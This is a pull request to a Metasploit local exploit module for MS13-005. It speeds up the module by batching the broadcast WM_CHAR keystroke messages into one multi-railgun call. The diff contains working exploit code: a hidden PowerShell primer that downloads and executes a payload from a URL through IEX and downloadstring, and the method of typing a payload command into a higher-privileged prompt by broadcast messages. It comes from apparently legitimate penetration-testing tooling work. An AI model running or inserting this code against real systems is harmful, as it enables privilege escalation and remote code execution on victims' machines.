### PR TITLE
Hwnd Broadcast Performance

### DIFF
--- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
+++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Local
       if datastore['CUSTOM_COMMAND']
         command = datastore['CUSTOM_COMMAND']
       else
-        print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the psh payload")
+        print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the powershell command line payload")
         command = cmd_psh_payload(payload.encoded)
       end
       make_it(command)
@@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Local
   def primer
     url = get_uri()
     download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-    command = "powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}"
+    command = "powershell.exe -w hidden -nop -c #{download_and_run}"
     make_it(command)
   end
 
@@ -212,10 +212,15 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
+    multi_rail = []
     command.each_char do |c|
       print c if command.length < 200
-      client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
+      multi_rail << ['user32', 'SendMessageA', ['HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0]]
+      #client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
     end
+
+    client.railgun.multi(multi_rail)
+
     print_line
     print_status("Executing command...")
     client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)

--- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
+++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -214,16 +214,12 @@ class Metasploit3 < Msf::Exploit::Local
     print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
     multi_rail = []
     command.each_char do |c|
-      print c if command.length < 200
       multi_rail << ['user32', 'SendMessageA', ['HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0]]
-      #client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
     end
 
-    client.railgun.multi(multi_rail)
-
-    print_line
+    multi_rail << ['user32', 'SendMessageA', ['HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0]]
     print_status("Executing command...")
-    client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
+    client.railgun.multi(multi_rail)
   end
 
   def on_request_uri(cli, request)


### PR DESCRIPTION
This builds upon https://github.com/rapid7/metasploit-framework/pull/2458 (Multi railgun fix) (https://github.com/rapid7/meterpreter/pull/28) to send the HWND_BROADCAST messages in a single mutli railgun call. 

This greatly reduces the time taken for the exploit to complete, which is especially a worry when using the TYPE technique due to the large payload. This probably reduces TYPE technique from a number of minutes (on a virtual network) to less than a minute. Improvement probably greater on a higher latency network.
